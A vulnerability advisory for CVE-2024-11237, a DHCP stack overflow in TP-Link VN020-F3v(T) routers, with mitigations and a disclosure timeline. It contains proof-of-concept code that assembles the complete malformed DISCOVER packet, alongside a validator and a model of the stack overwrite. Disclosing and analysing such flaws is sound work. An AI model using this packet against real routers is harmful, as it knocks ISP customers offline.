A critical vulnerability has been discovered in TP-Link VN020 F3v(T) routers running firmware version TT_V6.2.1021. The vulnerability allows remote attackers to trigger a stack-based buffer overflow through specially crafted DHCP DISCOVER packets, leading to denial of service (DoS) conditions.
Affected Devices:
- Router Model: TP-Link VN020-F3v(T)
- Firmware Version: TT_V6.2.1021
- Deployment: Primarily through Tunisie Telecom and Topnet ISPs
- Confirmed Variants: Also affects Algerian and Moroccan versions
Important Note: Due to the proprietary nature of the firmware, the exact internal implementation details are unknown. This analysis is based on observed behavior and black-box testing.
- CVE ID: CVE-2024-11237
- Type: Stack-based Buffer Overflow (CWE-121)
- Attack Vector: Remote (crafted DHCP DISCOVER packet; the sender only needs to be on a network segment served by the router's DHCP server, as DISCOVER is a link-local broadcast)
- Authentication: None Required
- Port: UDP/67 (DHCP Server)
- Impact: DoS (Confirmed) & RCE (Possible)
- Complexity: Low
[Basic DHCP Header] (BOOTP fixed fields, offsets per RFC 2131)
0x00: 01 ; op = BOOTREQUEST
0x01: 01 ; htype = Ethernet
0x02: 06 ; hlen = hardware address length (6 for a MAC)
0x03: 00 ; hops
0x04-0x07: XID ; random transaction ID
0x08-0x09: 0000 ; seconds elapsed
0x0A-0x0B: 8000 ; flags (broadcast bit set)
0x0C-0x1B: 0000 ; ciaddr, yiaddr, siaddr, giaddr (4 bytes each)
0x1C-0x21: MAC ; chaddr: client hardware address
0x22-0x2B: 0000 ; remainder of the 16-byte chaddr field (padding)
0x2C-0x6B: 0000 ; sname (64 bytes, unused)
0x6C-0xEB: 0000 ; file (128 bytes, unused)
0xEC-0xEF: 63 82 53 63 ; DHCP magic cookie; the options area starts at 0xF0
- DHCP Hostname Processing
// Overflow trigger through the hostname option (option 12, Host Name):
// 127 bytes of 'A' with a length byte that matches the data sent
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '\0';
add_option(packet, offset, 0x0C, 127, long_hostname);
- Vendor-Specific Option
// Vendor option manipulation (option 43, Vendor Specific Information)
unsigned char vendor_specific[] = {
0x00, 0x14, 0x22, // TP-Link vendor prefix
0xFF, 0xFF, 0xFF // Trigger condition
};
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);
- Length Field Manipulation
// Claimed vs actual length mismatch (option 61, Client Identifier):
// the length byte says 0xFF (255) but only one data byte follows, so a
// parser that trusts the length byte reads or copies 254 bytes it was never sent.
// add_option() must write 0xFF as the length byte while copying only the
// single byte that is actually present.
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });
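The three fragments above assume an add_option() helper the advisory never shows. The following is an added example, not the advisory's own PoC code: it assembles the complete malformed DISCOVER (fixed BOOTP header, magic cookie, message-type option, the 127-byte hostname, the vendor option, and the client identifier whose length byte claims 255 bytes while only one is sent), and pairs it with the length-consistency walk a DHCP server should run over the option area before copying anything. The add_option() signature, the constructed MAC and XID, and the function names are this example's assumptions.

```c
/* Added example (not the advisory's PoC): build the malformed DHCPDISCOVER
 * described above and show the length check a receiving DHCP server should
 * perform. add_option() here is an assumed helper; the advisory does not
 * show its body. The caller's pkt buffer must hold PKT_MAX bytes. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PKT_MAX   1500
#define OPT_START 240   /* 236-byte BOOTP fixed header + 4-byte magic cookie */

/* BOOTP fixed-field offsets (RFC 2131). */
enum { OP = 0, HTYPE = 1, HLEN = 2, HOPS = 3, XID = 4, FLAGS = 10,
       CHADDR = 28, COOKIE = 236 };

/* Append one TLV option. claimed_len goes on the wire as the length byte;
 * data_len is how many bytes are really copied, so the two may disagree on
 * purpose (the Length Field Manipulation case). Returns -1 if the packet
 * buffer would overflow (one byte is reserved for END). */
static int add_option(uint8_t *pkt, size_t *off, uint8_t code,
                      uint8_t claimed_len, const uint8_t *data, size_t data_len)
{
    if (*off + 2 + data_len + 1 > PKT_MAX) return -1;
    pkt[(*off)++] = code;
    pkt[(*off)++] = claimed_len;
    memcpy(pkt + *off, data, data_len);
    *off += data_len;
    return 0;
}

/* Assemble the DISCOVER: 127-byte hostname, the vendor option, and a
 * client identifier whose length byte (0xFF) exceeds the single byte sent.
 * Returns the datagram length, or 0 on failure. */
size_t build_malformed_discover(uint8_t *pkt, const uint8_t mac[6], uint32_t xid)
{
    static const uint8_t cookie[4] = { 0x63, 0x82, 0x53, 0x63 };
    static const uint8_t vendor[6] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF };
    uint8_t hostname[127], msgtype = 1 /* DHCPDISCOVER */, client_id = 0x01;
    size_t off = OPT_START;

    memset(pkt, 0, PKT_MAX);
    pkt[OP] = 1;                  /* BOOTREQUEST */
    pkt[HTYPE] = 1;               /* Ethernet */
    pkt[HLEN] = 6;
    pkt[HOPS] = 0;
    pkt[XID] = xid >> 24; pkt[XID + 1] = xid >> 16;
    pkt[XID + 2] = xid >> 8; pkt[XID + 3] = xid;
    pkt[FLAGS] = 0x80;            /* broadcast flag; secs and the four IPs stay zero */
    memcpy(pkt + CHADDR, mac, 6); /* the remaining 10 chaddr bytes stay zero */
    memcpy(pkt + COOKIE, cookie, 4);

    memset(hostname, 'A', sizeof hostname);
    if (add_option(pkt, &off, 53, 1, &msgtype, 1) ||       /* DHCP Message Type */
        add_option(pkt, &off, 12, 127, hostname, 127) ||   /* Host Name: 127 x 'A' */
        add_option(pkt, &off, 43, 6, vendor, 6) ||         /* Vendor Specific Information */
        add_option(pkt, &off, 61, 0xFF, &client_id, 1))    /* Client Identifier: claims 255, sends 1 */
        return 0;
    pkt[off++] = 255;             /* END */
    return off;
}

/* The check the receiving side should do before copying any option: walk the
 * option area and return the code of the first option whose length byte runs
 * past the end of the datagram; 0 if END is reached cleanly; -1 if the walk
 * runs out of bytes without an END. */
int first_overlong_option(const uint8_t *pkt, size_t len)
{
    size_t off = OPT_START;
    while (off < len) {
        uint8_t code = pkt[off++];
        if (code == 0) continue;             /* PAD */
        if (code == 255) return 0;           /* END */
        if (off >= len) return code;         /* no room for a length byte */
        uint8_t olen = pkt[off++];
        if (olen > len - off) return code;   /* length byte overruns the datagram */
        off += olen;
    }
    return -1;
}

/* Constructed MAC and XID so the output is reproducible. */
static uint8_t g_pkt[PKT_MAX];
size_t demo_build(void)
{
    static const uint8_t mac[6] = { 0x02, 0x00, 0x00, 0xAA, 0xBB, 0xCC };
    return build_malformed_discover(g_pkt, mac, 0x3903F326u);
}
int demo_byte(size_t i) { return g_pkt[i]; }
int demo_check(size_t len) { return first_overlong_option(g_pkt, len); }

int main(void)
{
    size_t n = demo_build();
    printf("%zu-byte DHCPDISCOVER; first option with an overlong length byte: %d\n",
           n, demo_check(n));
    for (size_t i = OPT_START; i < n; i++)
        printf("%02x%c", g_pkt[i], (i - OPT_START) % 16 == 15 ? '\n' : ' ');
    putchar('\n');
    return 0;
}
```

Running it prints the 144-byte option area as hex and reports option 61 as the first whose length byte does not fit; a server applying first_overlong_option() before parsing would drop this datagram instead of copying 255 bytes on the strength of the length field.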
While the exact internal implementation is unknown, the observed behavior suggests potential memory corruption issues:
Normal DHCP Hostname Processing
Stack Layout (Normal Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Return Address (4) |
+------------------------+
| Saved EBP (4) |
+------------------------+
| |
| Hostname Buffer |
| (64 bytes) |
| |
+------------------------+ Lower addresses
| Other Variables |
+------------------------+
What could potentially be happening inside the router?
Stack Layout (Overflow Case)
+------------------------+ Higher addresses
| Previous Frame |
+------------------------+
| Overwritten Return |
+------------------------+
| Overwritten EBP | <- Unknown state corruption
+------------------------+
| Overflow Data | <- 127 bytes of 'A'
| ... |
+------------------------+ Lower addresses
| Other Variables | <- Potentially corrupted
+------------------------+
This is theoretical, and certain details may not be entirely accurate, as TP-Link provides the firmware for this router exclusively to ISPs. In particular, the 4-byte saved frame pointer and return address follow the 32-bit layout drawn above; the device's actual architecture, calling convention and buffer size have not been verified.
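To make the two stack diagrams concrete, here is an added example that is not part of the advisory and not the router's code: it models the hypothesised frame as a byte array (64-byte hostname buffer, then 4-byte saved frame pointer, then 4-byte return address, then bytes of the caller's frame, little-endian slots), pushes hostname options of different lengths through an unchecked copy so the overwrite can be inspected rather than crash the process, and shows the bounded copy beside it. Function names, the sentinel values and the frame layout are this example's assumptions.

```c
/* Added example (not from the advisory): a byte-level model of the frame in
 * the stack diagrams. The unchecked memcpy is the hypothesised bug;
 * safe_hostname_copy is the bound the handler should enforce. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HOST_BUF   64      /* hostname buffer size from the diagram */
#define SAVED_FP   64      /* saved frame pointer sits right above it */
#define RET_ADDR   68      /* then the return address */
#define FRAME_SIZE 128     /* plus bytes belonging to the caller's frame */

static uint32_t load32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void store32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Hypothesised vulnerable handler: copies opt_len bytes into the 64-byte
 * buffer without comparing opt_len with the buffer size. It runs against the
 * modelled frame so the overwrite can be inspected instead of crashing. */
static void vulnerable_hostname_copy(uint8_t *frame, const uint8_t *opt, uint8_t opt_len)
{
    size_t n = opt_len < FRAME_SIZE ? opt_len : FRAME_SIZE; /* only keeps the model in bounds */
    memcpy(frame, opt, n);   /* the missing check: n may exceed HOST_BUF */
}

/* Hardened form: the option needs opt_len + 1 bytes (for the NUL); reject
 * anything larger rather than silently truncating a client-controlled field. */
int safe_hostname_copy(char *dst, size_t dst_size, const uint8_t *opt, uint8_t opt_len)
{
    if (dst_size == 0 || (size_t)opt_len >= dst_size) return -1;
    memcpy(dst, opt, opt_len);
    dst[opt_len] = '\0';
    return (int)opt_len;
}

/* What the modelled return-address slot holds after a hostname option of
 * opt_len 'A' bytes goes through the unchecked copy. The saved-FP and
 * return-address sentinels are constructed for the demonstration. */
uint32_t return_slot_after_overflow(uint8_t opt_len)
{
    uint8_t frame[FRAME_SIZE] = { 0 };
    uint8_t opt[255];
    store32(frame + SAVED_FP, 0x7fff0000u);
    store32(frame + RET_ADDR, 0x00400abcu);
    memset(opt, 'A', sizeof opt);
    vulnerable_hostname_copy(frame, opt, opt_len);
    return load32(frame + RET_ADDR);
}

/* Result of the hardened copy of an opt_len-byte hostname into a 64-byte
 * buffer: the copy's return value, or -2 if the string is not terminated
 * where it should be. */
int safe_copy_result(uint8_t opt_len)
{
    char host[HOST_BUF];
    uint8_t opt[255];
    memset(opt, 'A', sizeof opt);
    int rc = safe_hostname_copy(host, sizeof host, opt, opt_len);
    if (rc >= 0 && strlen(host) != (size_t)rc) return -2;
    return rc;
}

int main(void)
{
    printf("return slot after  32-byte hostname: 0x%08x\n", return_slot_after_overflow(32));
    printf("return slot after  70-byte hostname: 0x%08x (partial overwrite)\n",
           return_slot_after_overflow(70));
    printf("return slot after 127-byte hostname: 0x%08x\n", return_slot_after_overflow(127));
    printf("hardened copy, 63 bytes: %d; 64 bytes: %d; 127 bytes: %d\n",
           safe_copy_result(63), safe_copy_result(64), safe_copy_result(127));
    return 0;
}
```

A 63-byte hostname leaves the sentinel return address intact, 70 bytes overwrite the saved frame pointer and the low half of the return slot, and the 127-byte option from the PoC replaces the whole slot with 0x41414141, which is the state the "Overflow Case" diagram describes. The hardened copy refuses 64 bytes or more because the terminator would not fit.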
Proof-of-concept demonstration: POC.mp4
Wireshark capture of the attack: wireshark.mp4
The router may also attempt to restart itself after the crash, as shown here: router_effect.mp4
- Immediate device unresponsiveness
- DHCP service failure
- Automatic router restart
- Network disruption requiring manual intervention
- Initial Discovery: October 20, 2024
- Vendor Notification: November 3, 2024
- CVE Assignment: November 15, 2024
No official patch is currently available. Temporary mitigations include:
- Disable the DHCP server if it is not required (for example, when another device on the LAN already hands out addresses)
- Filter DHCP traffic (UDP/67) so that only trusted segments can reach the router's DHCP server; a DISCOVER is a link-local broadcast, so filtering at the network edge does not stop a client that is already on the router's LAN or Wi-Fi
- Consider alternative router models if possible
Mohamed Maatallah
- GitHub: @Zephkek
- Affiliation: Independent Security Researcher